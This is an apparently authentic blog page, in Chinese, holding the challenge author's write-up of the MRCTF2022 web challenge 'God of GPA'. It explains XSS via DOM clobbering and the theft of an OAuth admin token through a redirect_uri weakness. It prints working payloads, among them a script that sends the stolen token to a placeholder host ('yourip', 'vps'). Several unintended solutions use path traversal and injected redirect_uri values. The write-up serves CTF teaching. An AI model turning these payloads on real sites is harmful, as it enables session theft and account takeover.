

<!DOCTYPE html>
<html lang="en" color-mode=light>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>MRCTF2022_God_of_GPA_WP - Welcome to fallingblog</title>
  <meta name="apple-mobile-web-app-capable" content="yes" />
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="google" content="notranslate" />
  
  <meta name="description" content="前言自家战队办比赛，那怎么说也得凑个热闹，腆着脸出了一...">
  <meta name="author" content="Ibukifalling">
  <link rel="icon" href="/images/icons/favicon-16x16.png" type="image/png" sizes="16x16">
  <link rel="icon" href="/images/icons/favicon-32x32.png" type="image/png" sizes="32x32">
  <link rel="apple-touch-icon" href="/images/icons/apple-touch-icon.png" sizes="180x180">
  <meta rel="mask-icon" href="/images/icons/stun-logo.svg" color="#333333">
  
    <meta rel="msapplication-TileImage" content="/images/icons/favicon-144x144.png">
    <meta rel="msapplication-TileColor" content="#000000">
  

  
<link rel="stylesheet" href="/css/style.css">


  
    
<link rel="stylesheet" href="//at.alicdn.com/t/font_1445822_r673sha78lq.css">

  

  
    
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.css">

  

  
    
      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/xcode.min.css" name="highlight-style" mode="light">

      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/solarized-dark.min.css" name="highlight-style" mode="dark">

      
  

  <script>
    var CONFIG = window.CONFIG || {};
    var ZHAOO = window.ZHAOO || {};
    CONFIG = {
      isHome: false,
      fancybox: true,
      pjax: false,
      lazyload: {
        enable: true,
        only_post: 'false',
        loading: '[object Object]'
      },
      donate: {
        enable: true,
        alipay: 'http://qungz.photo.store.qq.com/qun-qungz/V529aeGH0GBCCT3kuwad344GhY0Vrm5T/V5bCgAxMDkwNzMxNjgyksC6Yb7uuDg!/800?w5=902&amp;h5=1028&amp;rf=viewer_421',
        wechat: 'http://qungz.photo.store.qq.com/qun-qungz/V529aeGH0GBCCT3kuwad344GhY0Vrm5T/V5bCgAxMDkwNzMxNjgyk8C6YYUouDg!/800?w5=1066&amp;h5=1021&amp;rf=viewer_421'
      },
      galleries: {
        enable: true
      },
      fab: {
        enable: true,
        always_show: false
      },
      carrier: {
        enable: true
      },
      daovoice: {
        enable: false
      },
      preview: {
        background: {
          default: '',
          api: ''
        },
        motto: {
          default: '我在开了灯的床头下，想问问自己的心啊。',
          typing: true,
          api: 'https://v2.jinrishici.com/one.json',
          data_contents: '["data","content"]'
        },
      },
      qrcode: {
        enable: true,
        type: 'url',
        image: 'https://pic.izhaoo.com/weapp-code.jpg',
      },
      toc: {
        enable: true
      },
      scrollbar: {
        type: 'default'
      },
      notification: {
        enable: false,
        delay: 4500,
        list: '',
        page_white_list: '',
        page_black_list: ''
      },
      search: {
        enable: false,
        path: ''
      }
    }
  </script>

  

  

<meta name="generator" content="Hexo 5.4.0"></head>

<body class="lock-screen">
  <div class="loading"></div>
  
    


  <nav class="navbar">
    <div class="left">
      
        <i class="iconfont iconhome j-navbar-back-home"></i>
      
      
        <i class="iconfont iconqrcode j-navbar-qrcode"></i>
      
      
        <i class="iconfont iconmoono" id="color-toggle" color-toggle="light"></i>
      
      
    </div>
    <div class="center">MRCTF2022_God_of_GPA_WP</div>
    <div class="right">
      <i class="iconfont iconmenu j-navbar-menu"></i>
    </div>
    
      <div id="qrcode-navbar"></div>
    
  </nav>

  
  

<nav class="menu">
  <div class="menu-container">
    <div class="menu-close">
      <i class="iconfont iconbaseline-close-px"></i>
    </div>
    <ul class="menu-content"><li class="menu-item">
        <a href="/ " class="underline "> 首页</a>
      </li><li class="menu-item">
        <a href="/galleries/ " class="underline "> 摄影</a>
      </li><li class="menu-item">
        <a href="/archives/ " class="underline "> 归档</a>
      </li><li class="menu-item">
        <a href="/tags/ " class="underline "> 标签</a>
      </li><li class="menu-item">
        <a href="/categories/ " class="underline "> 分类</a>
      </li><li class="menu-item">
        <a href="/about/ " class="underline "> 关于</a>
      </li></ul>
    
      <div class="menu-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
    
  </div>
</nav>
  <main id="main">
  <div class="article-wrap">
    <div class="row container">
      <div class="col-xl-3"></div>
      <div class="col-xl-6"><article class="article">
  <div class="wrap">
    <section class="head">
  <img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_a959f968865c285a43844c42449df094.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  draggable="false">
  <div class="head-mask">
    <h1 class="head-title">MRCTF2022_God_of_GPA_WP</h1>
    <div class="head-info">
      <span class="post-info-item"><i class="iconfont iconcalendar"></i>April 25, 2022</span>
      
      <span class="post-info-item"><i class="iconfont iconfont-size"></i>4000</span>
    </div>
  </div>
</section>
    <section class="main">
      <section class="content">
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>自家战队办比赛，那怎么说也得凑个热闹，腆着脸出了一道题</p>
<p>题目环境<br><a target="_blank" rel="noopener" href="https://github.com/Ibukifalling/my-ctf-challenge/tree/master/God_of_GPA_docker">https://github.com/Ibukifalling/my-ctf-challenge/tree/master/God_of_GPA_docker</a></p>
<h1 id="考点"><a href="#考点" class="headerlink" title="考点"></a>考点</h1><p>Xss via DOM Clobbering &amp; Steal Oauth token</p>
<h1 id="出题记录"><a href="#出题记录" class="headerlink" title="出题记录"></a>出题记录</h1><p>因为挖学校的洞的时候发现学校的系统用的都是Oauth实现的单点登录，然后打了半天也没打下来。很气，于是就想出一个跟oauth登录有关的题<img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_13bfd5a98885d67a2101d9d2b683a336.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><br><a target="_blank" rel="noopener" href="http://www.ruanyifeng.com/blog/2019/04/oauth_design.html">OAuth 2.0 的一个简单解释</a><br>(当然，题目里的oauth认证经过了很多简化，实际场景中还要更复杂一些)</p>
<p>出到一半的时候觉得有点太简单了……碰巧看到DOM Clobbering这个神奇的东西，于是就缝了一下（可能稍微有点脑洞）</p>
<p>(最后被各位师傅用各种非预期打爆了，出题人直接进行一波学习)</p>
<p>(顺便，题目域名中的brt指boren tech-博仁科技)</p>
<h1 id="预期解题思路"><a href="#预期解题思路" class="headerlink" title="预期解题思路"></a>预期解题思路</h1><h2 id="查看题目Web结构"><a href="#查看题目Web结构" class="headerlink" title="查看题目Web结构"></a>查看题目Web结构</h2><p>大致查看一下题目可以发现，题目由两个web组成：博仁科技统一身份认证和博仁课堂。统一身份认证在登录状态下时，博仁课堂可以直接一键登录。</p>
<p>具体的登录过程如下：<br>在博仁课堂(client端)界面点击一键登录按钮后，转到博仁科技统一身份认证(server端)的oauth认证页面，并且附带一个redirect_uri参数，即成功认证后的重定向地址<br><img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_64d29b8fde218578e7601ba5f952fe21.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>若此时server端为登录状态，则会显示认证成功，设置一个重定向到redirect_uri的跳转，并且带有一个token参数<br><img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_8296d07d7711f8a2654eab9a77922c81.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>client端在接受到这个token参数后会在后端向server端的api进行请求并且获取用户的身份信息（这一步选手是无法看到的），然后以获取到的用户名登录.</p>
<p>登录到博仁课堂后可以查看自己的成绩，当然默认情况是全挂了的<img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_9da87e6114942f79b6c433ea17f2cc6e.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p><img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_7d6393553713fc8b4334ede94718dcf9.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>点神秘按钮会跳到一个后门界面，但是这个后门只有管理员能用，说明要拿到管理权限<br><img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_d4a56442155fb108ecb277963ba68de3.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>博仁课堂还有一个树洞功能，可以发文章，但是没办法直接xss。(后端使用了DOMPurify进行过滤)<br><img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_cdc86decccfd03b8312ea5648589ae78.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>回来看server端，给了一个和zbr互动的界面(此处提示了bot的浏览器是chrome，跟之后的xss有关)<br><img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_a0a94d9a09ac027189b3ffb62fd8a434.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<h2 id="Xss-via-DOM-Clobbering"><a href="#Xss-via-DOM-Clobbering" class="headerlink" title="Xss via DOM Clobbering"></a>Xss via DOM Clobbering</h2><p>仔细查看博仁树洞查看文章页面的前端代码,发现zbr头像的部分用了一段非常诡异的代码</p>
<figure class="highlight htmlbars"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs htmlbars"><span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="javascript"></span></span><br><span class="javascript"><span class="xml">    <span class="hljs-keyword">let</span> Img =  <span class="hljs-built_in">window</span>.MyImg || &#123;<span class="hljs-attr">src</span>: <span class="hljs-string">&#x27;https://md.buptmerak.cn/uploads/upload_d12a3804a813ffb14fe38a318d6bfcf1.png&#x27;</span>&#125;</span></span><br><span class="javascript"><span class="xml">    <span class="hljs-keyword">let</span> Container = <span class="hljs-built_in">document</span>.createElement(<span class="hljs-string">&quot;div&quot;</span>);</span></span><br><span class="javascript"><span class="xml">    Container.innerHTML = <span class="hljs-string">&#x27;&lt;img class=&quot;avatar&quot; src=&quot;&#x27;</span> + Img.src + <span class="hljs-string">&#x27;&quot;&gt;&#x27;</span>;</span></span><br><span class="javascript"><span class="xml">    <span class="hljs-built_in">document</span>.body.appendChild(Container);</span></span><br><span class="javascript"><span class="xml">  </span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span></span><br></code></pre></td></tr></table></figure>

<p>此处可以利用dom xss，参考-<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7329">使用 Dom Clobbering 扩展 XSS</a></p>
<p>测试一下，文章内容填入</p>
<figure class="highlight htmlbars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs htmlbars"><span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">a</span> <span class="hljs-attr">id</span>=<span class="hljs-string">MyImg</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-name">a</span> <span class="hljs-attr">id</span>=<span class="hljs-string">MyImg</span> <span class="hljs-attr">name</span>=<span class="hljs-string">src</span> <span class="hljs-attr">href</span>=<span class="hljs-string">&#x27;cid:ibukifalling&quot;onerror=&quot;javascript:alert(1111);&quot;//&#x27;</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">a</span>&gt;</span></span><br></code></pre></td></tr></table></figure>

<p><img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_8565b4fdec200a6502a7e8ba97df4aa6.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>这里使用a标签和cid:进行了注入，也有其他师傅用img标签+data:等方式成功注入,注意测试的时候用chrome浏览器</p>
<h2 id="Get-Token"><a href="#Get-Token" class="headerlink" title="Get Token"></a>Get Token</h2><p>之前说到过一键登录是通过token实现的，那么很容易想到:让bot访问认证页，然后redirect_uri填自己的vps，不就拿到admin token了吗？</p>
<p>试一下会发现不行，因为redirect_uri有检测<img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_9da87e6114942f79b6c433ea17f2cc6e.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><br><img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_c018ca649cb7983555aa6311eba802af.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>不过再仔细试一下会发现只要url部分符合就行了，path部分可以随便填，也就是说<code>redirect_uri=http://brtclient.node3.mrctf.fun/123123</code>这种格式也是可以的</p>
<p>那么其实可以写两篇xss文章，让bot访问认证页之后重定向到另一篇xss，另一篇xss接到token之后再发送到vps(也有师傅写成二合一，本质上是一样的)</p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><p>part1(网上随便抄的接受get参数方法)</p>
<figure class="highlight htmlbars"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs htmlbars"><span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">a</span> <span class="hljs-attr">id</span>=<span class="hljs-string">MyImg</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-name">a</span> <span class="hljs-attr">id</span>=<span class="hljs-string">MyImg</span> <span class="hljs-attr">name</span>=<span class="hljs-string">src</span> <span class="hljs-attr">href</span>=<span class="hljs-string">&#x27;cid:ibukifalling&quot;onerror=&quot;javascript:function getQueryVariable(variable)</span></span></span><br><span class="hljs-string"><span class="hljs-tag"><span class="xml">        &#123;</span></span></span><br><span class="hljs-string"><span class="hljs-tag"><span class="xml">               var query = window.location.search.substring(1);</span></span></span><br><span class="hljs-string"><span class="hljs-tag"><span class="xml">               var vars = query.split(`&amp;`);</span></span></span><br><span class="hljs-string"><span class="hljs-tag"><span class="xml">               for (var i=0;i&lt;vars.length;i++) &#123;</span></span></span><br><span class="hljs-string"><span class="hljs-tag"><span class="xml">                       var pair = vars[i].split(`=`);</span></span></span><br><span class="hljs-string"><span class="hljs-tag"><span class="xml">                       if(pair[0] == variable)&#123;return pair[1];&#125;</span></span></span><br><span class="hljs-string"><span class="hljs-tag"><span class="xml">               &#125;</span></span></span><br><span class="hljs-string"><span class="hljs-tag"><span class="xml">               return(false);</span></span></span><br><span class="hljs-string"><span class="hljs-tag"><span class="xml">        &#125;</span></span></span><br><span class="hljs-string"><span class="hljs-tag"><span class="xml">        var token = getQueryVariable(`token`);</span></span></span><br><span class="hljs-string"><span class="hljs-tag"><span class="xml">        console.log(token);</span></span></span><br><span class="hljs-string"><span class="hljs-tag"><span class="xml">        document.write(`&lt;img src=http://yourip/token=`+token+` &gt;`);</span></span></span><br><span class="hljs-string"><span class="hljs-tag"><span class="xml">        &quot;//&#x27;</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">a</span>&gt;</span></span><br></code></pre></td></tr></table></figure>

<p>part2</p>
<figure class="highlight htmlbars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs htmlbars"><span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">a</span> <span class="hljs-attr">id</span>=<span class="hljs-string">MyImg</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-name">a</span> <span class="hljs-attr">id</span>=<span class="hljs-string">MyImg</span> <span class="hljs-attr">name</span>=<span class="hljs-string">src</span> <span class="hljs-attr">href</span>=<span class="hljs-string">&#x27;cid:ibukifalling&quot;onerror=&quot;javascript:setTimeout(function()&#123;location.href=`http://brtserver.node3.mrctf.fun/oauth/authorize?redirect_uri=http://brtclient.node3.mrctf.fun/view/part1uuid`&#125;,1000)&quot;//&#x27;</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">a</span>&gt;</span></span><br></code></pre></td></tr></table></figure>

<p>向bot发送part2的uuid，part2会访问oauth认证地址并且重定向到part1，part1再发送到远程监听服务器上，以此获得token</p>
<p>（给没做出来的带火看一下后门长啥样，是一个一键满绩页面）<br><img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_d035c57d59aa0b8991baa96cdff22fd3.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><br>（输入用户id后可以令该用户所有科目变成一佰分）<br><img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_0de5ea9fdc6319e30f21eb9690db440d.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<h1 id="非预期解"><a href="#非预期解" class="headerlink" title="非预期解"></a>非预期解</h1><p>实际比赛中，各路大佬们打出了各种天马行空的非预期，令出题人叹为观止</p>
<h2 id="非预期1-夺舍bot"><a href="#非预期1-夺舍bot" class="headerlink" title="非预期1-夺舍bot"></a>非预期1-夺舍bot</h2><p>由于出题人在写正则的时候忘记写开头和结尾匹配，导致发送uuid的校验出现问题…<img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_13bfd5a98885d67a2101d9d2b683a336.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><br><img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_0a240aea1f323e0e4d3c59a4724f2ceb.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>如果向bot发送形如<code>uuid/../../login?token=yourtoken</code>的uuid，可以令bot在博仁课堂端登录上选手本人的账户</p>
<p>那有人就要问了，bot登自己账户有啥用阿？</p>
<p>这里又要甩锅给出题人了…登录成功的页面提示信息是直接拼接用户名的…<br><img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_5e2b581c44380f474b63bb2006d5af1b.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>所以可以在用户名处进行xss…直接把payload写在用户名里…（我哪知道会有人这么玩啊QAQ）</p>
<p>因为此时bot在server端仍然是管理员账号，在用户名的xss中令bot先访问<code>brtserver.node3.mrctf.fun/oauth/authorize</code>可以拿回管理员权限，也就是打了一个CSRF<br><img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_f6a16a74049c0fa47b1bf97bb961939f.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>可怕的是居然有多队打出这个非预期…师傅们的脑洞实在是太大了…（有没有一种可能，是出题人的安全开发意识没到位呢）</p>
<h2 id="非预期2-oauth-xss"><a href="#非预期2-oauth-xss" class="headerlink" title="非预期2-oauth xss"></a>非预期2-oauth xss</h2><p>这个比上面那个稍微好一点，但依然震撼出题人一整年……并且也有多队打出了这个非预期……</p>
<p>由于跳转界面也是直接拼接的redirect_uri，而redirect_uri后面的路径是可以随便写的，所以可以在redirect_uri处进行xss<img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_13bfd5a98885d67a2101d9d2b683a336.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><br><img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_e3d94d238140c6c7c08a67662301f0e2.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>在文章的xss处令bot访问<code>http://brtserver.node2.buptmerak.cn/oauth/authorize? redirect_uri=http://brtclient.node2.buptmerak.cn/&quot;;window.location=&quot;http://vps/</code>可以直接拿到token，这样就不用再弹一次了</p>
<h2 id="非预期3-token是啥？能吃么？"><a href="#非预期3-token是啥？能吃么？" class="headerlink" title="非预期3-token是啥？能吃么？"></a>非预期3-token是啥？能吃么？</h2><p>这个应该算是比较正常的非预期了，不尝试获得登录token而是直接令bot访问后门页面。其实把后门页面写成交互式而不是直接获得flag就是希望选手尝试获得token。看来下次还是得在前端加点混淆……</p>
<p><img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_f6a16a74049c0fa47b1bf97bb961939f.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<h1 id="后话"><a href="#后话" class="headerlink" title="后话"></a>后话</h1><p><img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_6a2b8b404b27cb17fe8857f679b50909.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><br><img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_30be7d2504b4068cba516842293426d3.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><br><img   class="lazyload" data-original="https://md.buptmerak.cn/uploads/upload_41bf92cb388bf7583a116538edfedb5e.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>关于本次比赛密码题，强烈推荐<br><a target="_blank" rel="noopener" href="https://www.zhihu.com/answer/2455486891">https://www.zhihu.com/answer/2455486891</a></p>

      </section>
      <section class="extra">
        
        
          <section class="donate">
  <div id="qrcode-donate">
    <img   class="lazyload" data-original="http://qungz.photo.store.qq.com/qun-qungz/V529aeGH0GBCCT3kuwad344GhY0Vrm5T/V5bCgAxMDkwNzMxNjgyksC6Yb7uuDg!/800?w5=902&h5=1028&rf=viewer_421" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" >
  </div>
  <div class="icon">
    <a href="javascript:;" id="alipay"><i class="iconfont iconalipay"></i></a>
    <a href="javascript:;" id="wechat"><i class="iconfont iconwechat-fill"></i></a>
  </div>
</section>
        
        
  <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/MRCTF/" rel="tag">MRCTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web/" rel="tag">Web</a></li></ul> 

        
  <nav class="nav">
    <a href="/2099/01/10/my2021/"><i class="iconfont iconleft"></i>2021年度划水报告</a>
    <a href="/2021/12/19/byteCTF2021/">byteCTF部分Web题目复现<i class="iconfont iconright"></i></a>
  </nav>

      </section>
      
    </section>
  </div>
</article></div>
      <div class="col-xl-3">
        
          
  <aside class="toc-wrap">
    <h3 class="toc-title">文章目录：</h3>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%80%83%E7%82%B9"><span class="toc-text">考点</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%87%BA%E9%A2%98%E8%AE%B0%E5%BD%95"><span class="toc-text">出题记录</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%A2%84%E6%9C%9F%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="toc-text">预期解题思路</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9F%A5%E7%9C%8B%E9%A2%98%E7%9B%AEWeb%E7%BB%93%E6%9E%84"><span class="toc-text">查看题目Web结构</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Xss-via-DOM-Clobbering"><span class="toc-text">Xss via DOM Clobbering</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Get-Token"><span class="toc-text">Get Token</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#exp"><span class="toc-text">exp</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%9D%9E%E9%A2%84%E6%9C%9F%E8%A7%A3"><span class="toc-text">非预期解</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%9D%9E%E9%A2%84%E6%9C%9F1-%E5%A4%BA%E8%88%8Dbot"><span class="toc-text">非预期1-夺舍bot</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%9D%9E%E9%A2%84%E6%9C%9F2-oauth-xss"><span class="toc-text">非预期2-oauth xss</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%9D%9E%E9%A2%84%E6%9C%9F3-token%E6%98%AF%E5%95%A5%EF%BC%9F%E8%83%BD%E5%90%83%E4%B9%88%EF%BC%9F"><span class="toc-text">非预期3-token是啥？能吃么？</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%90%8E%E8%AF%9D"><span class="toc-text">后话</span></a></li></ol>
  </aside>

        
      </div>
    </div>
  </div>
</main>
  

<footer class="footer">
  <div class="footer-social"><a 
        href="tencent://message/?Menu=yes&uin=3067733270 "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#12B7F5'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconQQ "></i>
      </a><a 
        href="javascript:; "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#09BB07'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconwechat-fill "></i>
      </a><a 
        href="mailto:3067733270@qq.com "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color=#FF3B00" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconmail"></i>
      </a></div>
  
    <div class="footer-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
  
</footer>
  
      <div class="fab fab-plus">
    <i class="iconfont iconplus"></i>
  </div>
  
  
  <div class="fab fab-up">
    <i class="iconfont iconcaret-up"></i>
  </div>
  
  
  
    
<script src="/js/color-mode.js"></script>

  
  
</body>

<script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>



  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js"></script>




  
<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.js"></script>






  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.qrcode/1.0/jquery.qrcode.min.js"></script>




<script src="/js/utils.js"></script>
<script src="/js/script.js"></script>







  <script>
    (function () {
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
      } else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
      }
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>













</html>